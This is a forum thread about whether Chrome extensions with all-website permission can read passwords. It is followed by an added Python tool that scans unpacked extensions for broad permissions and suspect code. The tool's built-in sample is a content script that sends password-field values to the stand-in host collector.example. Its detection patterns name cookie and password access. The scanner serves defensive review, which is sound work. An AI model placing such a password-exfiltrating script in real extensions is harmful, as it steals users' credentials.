
Chrome Extension says “it can read my data in all the websites I visit” - rammy1234
Will these extensions be able to read my passwords? What do you all feel about this? How safe are any Chrome extensions?
======
chatmasta
You can read the source and see for yourself. I use an extension called CRX
viewer [0] to unpack extensions and view their source before installing them.
When you’re in the extensions store you just click the button and it shows you
the source.

When inspecting the source I grep for http/network calls and anything that
looks suspicious. Most extensions are fairly simple and it’s easy to see when
they’re not malicious.

Problem is, those extensions can update their source at any time. Ownership
can change. A good extension can turn malicious while you aren’t looking. For
that reason, if I really need an extension with “all website” permissions, I
make sure to disable it and only enable it when I use it.

The only long running extension with those permissions on my machine is
uBlock.

[0] https://chrome.google.com/webstore/detail/chrome-extension-source-v/jifpbeccnghkjeaalbbjmodiffmgedin?hl=en

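The inspection routine described in the reply above (unpack the extension, then grep for network calls and broad permissions) can be scripted. The following is an added example, not code from the thread or from the CRX viewer extension it links: it assumes an already-unpacked extension directory containing `manifest.json` and its scripts, flags every host pattern that grants access to all sites, and greps each script for the categories a reviewer would look at first. The sample extension it audits is constructed for the demonstration and is not a real extension.

```python
import json
import re
import tempfile
from pathlib import Path

# Match patterns that reach every site; anything here is the "all websites" grant.
BROAD_HOST_PATTERNS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}

# Regexes a reviewer greps for; category names are our own labels.
SUSPECT_PATTERNS = [
    ("network", re.compile(r"\bfetch\s*\(|XMLHttpRequest|sendBeacon|new\s+WebSocket|https?://")),
    ("dynamic-code", re.compile(r"\beval\s*\(|new\s+Function\s*\(|\.innerHTML\s*=")),
    ("password-field", re.compile(r"type\s*=\s*[\"']?password|input\[type=[\"']?password")),
    ("cookies", re.compile(r"document\.cookie|chrome\.cookies")),
    ("obfuscation", re.compile(r"\batob\s*\(|String\.fromCharCode")),
]

# Constructed sample extension: a content script that exfiltrates password
# fields, plus a harmless service worker, to show what the report looks like.
SAMPLE_MANIFEST = {
    "manifest_version": 3,
    "name": "Example Helper (constructed sample)",
    "version": "1.0",
    "permissions": ["storage", "tabs"],
    "host_permissions": ["<all_urls>"],
    "content_scripts": [{"matches": ["<all_urls>"], "js": ["content.js"]}],
    "background": {"service_worker": "background.js"},
}
SAMPLE_FILES = {
    "manifest.json": json.dumps(SAMPLE_MANIFEST, indent=2),
    "content.js": """// Constructed sample: watches every password field and ships it off-site.
const pw = document.querySelector('input[type=password]');
if (pw) {
  pw.addEventListener('change', () => {
    fetch('https://collector.example/log', {method: 'POST', body: pw.value});
  });
}
""",
    "background.js": """// Constructed sample: a benign service worker.
chrome.runtime.onInstalled.addListener(() => {
  chrome.storage.local.set({installed: Date.now()});
});
""",
}


def broad_host_patterns(manifest):
    """Return (where, pattern) for every manifest entry that grants all-site access."""
    found = []
    for key in ("permissions", "host_permissions", "optional_host_permissions"):
        for pattern in manifest.get(key, []):
            if pattern in BROAD_HOST_PATTERNS:
                found.append((key, pattern))
    for i, script in enumerate(manifest.get("content_scripts", [])):
        for pattern in script.get("matches", []):
            if pattern in BROAD_HOST_PATTERNS:
                found.append((f"content_scripts[{i}].matches", pattern))
    return found


def scan_script(source):
    """Return (line_no, category, line) for every line matching a suspect pattern."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for category, rx in SUSPECT_PATTERNS:
            if rx.search(line):
                findings.append((lineno, category, line.strip()))
    return findings


def audit_extension(root):
    """Audit an unpacked extension directory and return a structured report."""
    root = Path(root)
    manifest = json.loads((root / "manifest.json").read_text(encoding="utf-8"))
    report = {"name": manifest.get("name"), "broad_hosts": broad_host_patterns(manifest), "scripts": {}}
    for js in sorted(root.rglob("*.js")):
        findings = scan_script(js.read_text(encoding="utf-8"))
        if findings:
            report["scripts"][str(js.relative_to(root))] = findings
    return report


def run_sample_audit():
    """Write the constructed sample to a temp dir, audit it, and return the report."""
    directory = Path(tempfile.mkdtemp())
    for name, text in SAMPLE_FILES.items():
        (directory / name).write_text(text, encoding="utf-8")
    return audit_extension(directory)


if __name__ == "__main__":
    report = run_sample_audit()
    print(f"Extension: {report['name']}")
    for where, pattern in report["broad_hosts"]:
        print(f"  all-site access via {where}: {pattern}")
    for path, findings in report["scripts"].items():
        for lineno, category, line in findings:
            print(f"  {path}:{lineno} [{category}] {line}")
```

Run it against a real unpacked extension with `audit_extension("/path/to/unpacked")`. A hit is a prompt to read the surrounding code, not a verdict: a password manager legitimately touches password fields, and a sync feature legitimately calls `fetch`. What the report cannot tell you is what the next update will contain, which is the point the reply makes about disabling broad-permission extensions when they are not in use.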
~~~
rammy1234
Why does an extension need the all-websites permission? Even then, can't Google provide
a mechanism to keep password fields out of the scope of access? Is there a reason
why it is not done, technically speaking?

~~~
chatmasta
Lazy developers, that’s all there is to it.

And of course some extensions do need access to the whole page, including
password fields. For example a password manager obviously needs access (though
it shouldn’t need to read the password field, only write to it).

As to why it’s not possible to have super granular permissions (i.e.
restricting to certain elements on the page) — that would break the whole
extension model, because scripts you inject into the page would have to
operate on a “shadow DOM” of sorts. Also properly sandboxing within a single
DOM would be porously impossible.

Now that I type it out though, I could see how maybe it would be possible to
construct a restricted, parallel DOM for an extension to interact with... but
I really don’t think the complexity is worth changing the status quo.

